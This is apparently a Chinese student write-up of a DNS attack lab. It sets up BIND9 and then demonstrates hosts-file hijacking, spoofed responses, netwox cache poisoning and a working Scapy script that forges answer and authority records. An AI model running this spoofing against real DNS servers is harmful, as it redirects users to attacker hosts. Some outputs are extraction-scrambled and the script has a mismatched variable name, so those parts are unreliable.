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Task1: Configure the User Machine

本实验共需要3台主机,其IP地址分别如下所示:

```
1192.168.43.79//主机A,是一台Ubuntu16.04-32,用作用户机2192.168.43.177//主机B,是一台Ubuntu16.04-64,用作DNS服务器3192.168.43.236//主机C,是seed,用作攻击
```

首先,在主机B上安装bind9:

```
1 sudo apt-get install bind9 //下载安装
2 service bind9 restart //重启
```

然后,在主机A上更改其DNS配置:

在主机A上,通过如下命令行打开相关文件:

```
1 sudo gedit /etc/resolvconf/resolv.conf.d/head
```

在文件末尾加入:

```
1 nameserver 192.168.43.177
```

如下图所示:

```
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
nameserver 192.168.43.177
```

然后,在主机A上,通过如下命令打开相关文件:

```
1 sudo gedit /etc/resolv.conf
```

在文件末尾添加注释,并加入:

```
1 nameserver 192.168.43.177
```

如下图所示:

```
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
#nameserver 127.0.1.1
nameserver 192.168.43.177
```

最后,在主机A上输入dig www.iqiyi.com,测试结果如下图所示:

```
.
user@user-VirtualBox:~$ dig www.iqiyi.com
   <>>> DiG 9.10.3-P4-Ubuntu <<>> www.iqiyi.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 52598
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 4, ADDITIONAL: 5
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.iqiyi.com.
;; ANSWER SECTION:
,, Answer section.
www.iqiyi.com. 568 IN
ipv6-static.dns.iqiyi.com. 568 IN
ipv6-static.dns.iqiyi.com. 568 IN
ipv6-static.dns.iqiyi.com. 568 IN
ipv6-static.dns.iqiyi.com. 568 IN
                                                                 CNAME
                                                                               ipv6-static.dns.iqiyi.com.
                                                                               112.29.146.149
112.29.146.147
                                                                               112.29.146.151
                                                                               112.29.146.146
;; AUTHORITY SECTION:
iqiyi.com.
                                        172765
                                                                               ns4.iqiyi.com.
                                       172765
172765
iqiyi.com.
iqiyi.com.
                                                                              ns1.iqiyi.com.
ns2.iqiyi.com.
ns3.iqiyi.com.
                                                                  NS
iqiyi.com.
                                                                  NS
;; ADDITIONAL SECTION:
                                       172765 IN
172765 IN
172765 IN
172765 IN
ns1.iqiyi.com.
ns2.iqiyi.com.
                                                                              43.225.84.1
                                                                              43.225.85.1
ns3.iqiyi.com.
ns4.iqiyi.com.
                                                                               43.225.84.1
                                                                              43.225.85.1
;; Query time: 2 msec
;; SERVER: 192.168.43.177#53(192.168.43.177)
;; WHEN: Wed Sep 16 17:39:41 CST 2020
;; MSG SIZE rcvd: 272
```

可见,主机A的DNS服务器已经被改为主机B。

Task2: Setup a Local DNS Server

配置主机B为本地DNS服务器:

2.1 Configure the BIND 9 server

```
修改/etc/bind/named.conf.options文件为下图所示:
```

```
options {
    directory "/var/cache/bind";
    dump-file "var/cache/bind/dump.db";

并输入命令:

1 sudo rndc dumpdb -cache // Dump the cache to the sepcified file
2 sudo rndc flush // Flush the DNS cache
```

2.2 Turn off DNSSEC

修改/etc/bind/named.conf.options文件,关闭DNSSEC保护:

```
options {
    directory "/var/cache/bind";

    dump-file "var/cache/bind/dump.db";

    // dnssec-validation auto;
    dnssec-enable no;
```

2.3 Start DNS server

重启BIND 9服务器:

```
1 sudo service bind9 restart
```

2.4 Use the DNS server

在主机A中输入ping www.iqiyi.com测试,如下图所示:

No.	Time	Source	Destination	Protocol	Length Info
	1 0.000000000	MeizuTec_92:20:4d	IntelCor_b8:b5:78	ARP	60 192.168.43.237 is at 90:f0:52:92:20:4d
	2 5.242229647	MeizuTec_92:20:4d	Broadcast	ARP	60 Who has 192.168.43.200? Tell 192.168.43.237
	3 25.219953422	192.168.43.79	192.168.43.177	DNS	73 Standard query 0xb576 A www.iqiyi.com
-	4 25.220552845	192.168.43.177	192.168.43.79	DNS	303 Standard query response 0xb576 A www.iqiyi.com
	5 25.220762473	192.168.43.79	112.29.146.147	ICMP	98 Echo (ping) request id=0x1814, seq=1/256, ttl=
	6 25.323906200	112.29.146.147	192.168.43.79	ICMP	98 Echo (ping) reply id=0x1814, seq=1/256, ttl=
	7 25.324130995	192.168.43.79	192.168.43.177	DNS	87 Standard query 0x8e10 PTR 147.146.29.112.in-add
	8 30.223211781	PcsCompu_0b:b2:0b	PcsCompu_42:06:65	ARP	60 Who has 192.168.43.79? Tell 192.168.43.177
	9 30.223233449	PcsCompu_42:06:65	PcsCompu_0b:b2:0b	ARP	42 192.168.43.79 is at 08:00:27:42:06:65
	10 30.273955875	MeizuTec_92:20:4d	PcsCompu_87:b9:9d	ARP	60 192.168.43.237 is at 90:f0:52:92:20:4d
	11 30.328581268	192.168.43.79	192.168.43.177	DNS	87 Standard query 0x8e10 PTR 147.146.29.112.in-add
4					•

可见,主机A会先访问主机B。

Task3: Host a Zone in the Local DNS Server

3.1 Create zones

在本地DNS服务器(主机B)中,向/etc/bind/named.conf文件添加内容,加入两个zone:

```
zone "example.com" {
   type master;
   file "/etc/bind/example.com.db";
};

zone "0.168.192.in-addr.arpa" {
   type master;
   file "/etc/bind/192.168.0.db";
};
```

3.2 Setup the forward lookup zone file

在/etc/bind/目录下创建名为example.com.db的zone文件(hostname to IP):

```
1 $TTL 3D; default expiration time of all resource records
  without
         ; their own TTL
3 @
         IN SOA ns.example.com. admin.example.com. (
4
                        ; Serial
         1
5
         8н
                        ; Refresh
6
                        ; Retry
         2H
7
                        ; Expire
         4W
8
         1D )
                        ; Minimum
9
```

```
10 @
           IN
                   NS
                           ns.example.com.
                                                 ;Address of
    nameserver
11 @
                           10 mail.example.com.
                                                 ;Primary Mail
           IN
                   MX
    Exchanger
12
13 www
                           192.168.0.101
                                           ;Address of
            IN
    www.example.com
14 mail
                           192.168.0.102
                                           ;Address of
           IN
    mail.example.com
           IN
                           192.168.0.10
                                           ;Address of
    ns.example.com
16 *.example.com. IN A
                           192.168.0.100
                                           ;Address for other URL
17
                                           ; the example.com
    domain
```

3.3 Set up the reverse lookup zone file

在/etc/bind/目录下创建名为192.168.0.db 的zone文件(IP to hostname)

```
$TTL 3D
 2
                             ns.example.com. admin.example.com. (
            IN
                    SOA
 3
                    1
 4
                     8н
 5
                     2H
6
                    4W
 7
                    1D)
8
                    NS
                             ns.example.com.
            IN
9
   101
            IN
                    PTR
                             www.example.com.
10 102
                             mail.example.com.
                     PTR
            IN
11
    10
                             ns.example.com.
            IN
                     PTR
```

3.4 Restart the BIND server and test

输入 sudo service bind9 restart, 重启bind9服务器。

在主机A上,输入dig www.example.com测试,结果如下图所示:

```
user@user-VirtualBox:~$ dig www.example.com
; <<>> DiG 9.10.3-P4-Ubuntu <<>> www.example.com
;; global options: +cmd
:: Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54742
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.example.com.
                                      IN
;; ANSWER SECTION:
www.example.com.
                            259200 IN
                                               Α
                                                         192.168.0.101
;; AUTHORITY SECTION:
                            259200 IN
example.com.
                                               NS
                                                         ns.example.com.
;; ADDITIONAL SECTION:
ns.example.com.
                            259200 IN
                                                       192.168.0.10
;; Query time: 0 msec
;; SERVER: 192.168.43.177#53(192.168.43.177)
;; WHEN: Wed Sep 16 18:49:51 CST 2020
   MSG SIZE rcvd: 93
```

可见,成功解析出了IP地址为192.168.0.101

Task4: Modifying the Host File

攻击者控制了用户主机,直接修改/etc/hosts 文件,将 www.bank32.com 指向 1.2.3.4。

```
127.0.0.1 localhost
127.0.1.1 user-VirtualBox

# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

1.2.3.4 www.bank32.com
```

被攻击前,用户主机 ping www.bank32.com,如下图所示:

```
user@user-VirtualBox:~$ ping www.bank32.com
PING bank32.com (34.102.136.180) 56(84) bytes of data.
64 bytes from 34.102.136.180: icmp_seq=1 ttl=110 time=254 ms
64 bytes from 34.102.136.180: icmp_seq=2 ttl=110 time=224 ms
```

被攻击前,用户主机 ping www.bank32.com, 如下图所示:

```
user@user-VirtualBox:~$ ping www.bank32.com
PING www.bank32.com (1.2.3.4) 56(84) bytes of data.
```

可见,被攻击前www.bank32.com对应IP为34.102.136.180被攻击后对应IP变成了1.2.3.4

Task5: Directly Spoofing Response to User

攻击前,用户主机 dig www.example.net,返回结果:

```
user@user-VirtualBox:~$ dig www.example.net
 ; <<>> DiG 9.10.3-P4-Ubuntu <<>> www.example.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56156
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.example.net.
                                           IN
;; ANSWER SECTION:
www.example.net.
                                86400
                                          IN
                                                                93.184.216.34
;; Query time: 2966 msec
;; SERVER: 192.168.43.177#53(192.168.43.177)
;; WHEN: Wed Sep 16 19:06:55 CST 2020
   MSG SIZE rcvd: 60
```

清楚本地DNS服务器缓存:

```
1 sudo rndc flush
```

在主机C中,进行攻击,如下图所示:

在主机A中,输入dig www.example.net,结果如下图所示:

```
user@user-VirtualBox:~$ dig www.example.net
; <<>> DiG 9.10.3-P4-Ubuntu <<>> www.example.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22788
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;www.example.net.
                                    IN
;; ANSWER SECTION:
www.example.net.
                           10
                                    IN
                                                      1.2.3.4
;; AUTHORITY SECTION:
ns.example.net.
                           10
                                    IN
                                             NS
                                                      ns.example.net.
;; ADDITIONAL SECTION:
ns.example.net.
                           10
                                    IN
                                                      1.2.3.5
;; Query time: 181 msec
;; SERVER: 192.168.43.177#53(192.168.43.177)
;; WHEN: Wed Sep 16 19:20:21 CST 2020
;; MSG SIZE rcvd: 88
```

Task6: DNS Cache Poisoning Attack

首先,输入 sudo rndc flush 清空本地DNS服务器缓存。

在主机C上,使用netwox 105伪造来自其他DNS服务器的报文发给本地DNS服务器 10.0.2.4,造成DNS缓存攻击:

最后, 主机A使用 dig www.example.net 进行测试, 结果如下图所示:

```
user@user-VirtualBox:~$ dig www.example.net
 <>>> DiG 9.10.3-P4-Ubuntu <<>> www.example.net
; global options: +cmd
; Got answer:
; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39111
; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;www.example.net.
                                    IN
;; ANSWER SECTION:
www.example.net.
                           600
                                    IN
                                                       1.2.3.4
;; AUTHORITY SECTION:
                                                       ns.example.net.
                           600
                                             NS
ns.example.net.
                                    ΤN
;; ADDITIONAL SECTION:
ns.example.net.
                           600
                                    IN
                                                       1.2.3.5
:: Ouerv time: 46 msec
; SERVER: 192.168.43.177#53(192.168.43.177)
  WHEN: Wed Sep 16 19:40:43 CST 2020
 ; MSG SIZE rcvd: 88
```

在本地DNS服务器(主机B)中,输入命令:

```
sudo rndc dumpdb -cache$
sudo cat /var/cache/bind/dump.db
```

```
Start view _default
 Cache dump of view '_default' (cache _default)
$DATE 20200915093245
 authanswer
                        587
                                IN NS
                                        ns.example.net.
 authauthority
ns.example.net.
                        587
                                NS
                                        ns.example.net.
; additional
                                Α
                                        1.2.3.5
                        587
: authanswer
                                        1.2.3.4
www.example.net.
                        587
```

Task7: DNS Cache Poisoning: Targeting the Authority Section

首先,清空本地DNS服务器缓存

然后,攻击者进行DNS缓存中毒攻击时,不仅伪造 Answer部分,还伪造Authority部分,将 example.net 域中的任何主机名的查询服务指向 ns.attacker32.com ,编写代码 dns_cp.py:

```
1 #!/usr/bin/python
 2 from scapy.all import *
 3
 4 def spoof_dns(pkt):
 5
        if(DNS in pkt and 'www.example.net' in pkt[DNS].qd.qname):
            IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
 6
            UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
 7
 8
 9
            Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',
    ttl=259200, rdata='1.2.3.4')
10
            NSsec = DNSRR(rrname='example.net', type='NS',
    ttl=259200, rdata='ns.attacker32.com')
11
12
13
            DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1,
    rd=0, qr=1,qdcount=1, ancount=1, nscount=1, an=AnSsec,
    ns=NSsec)
14
15
            spoofpkt = IPpkt/UDPpkt/DNSpkt
16
            send(spoofpkt)
17
18 pkt = sniff(filter='udp and (src host 192.168.43.79 and dst
    port 53)', prn=spoof_dns)
```

进行攻击:

```
[09/16/20]seed@VM:~$ sudo ./dns_cp.py
.
Sent 1 packets.
```

在主机A上,输入dig www.example.net进行测试,输出结果如下图所示:

```
user@user-VirtualBox:~$ dig www.example.net

; <<>> DiG 9.10.3-P4-Ubuntu <<>> www.example.net

;; global options: +cmd

;; Got answer:

;; ->>HEADER<-- opcode: QUERY, status: NOERROR, id: 28082

;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:

;; www.example.net. IN A

;; ANSWER SECTION:

www.example.net. 259200 IN A 1.2.3.4

;; AUTHORITY SECTION:
example.net. 259200 IN NS ns.attacker32.com.

;; Query time: 17 msec

;; SERVER: 192.168.43.177#53(192.168.43.177)

;; WHEN: Wed Sep 16 20:40:36 CST 2020

;; MSG SIZE rcvd: 106</pre>
```

可见,返回的answer为1.2.3.4,authority为ns.attacker32.com,攻击成功!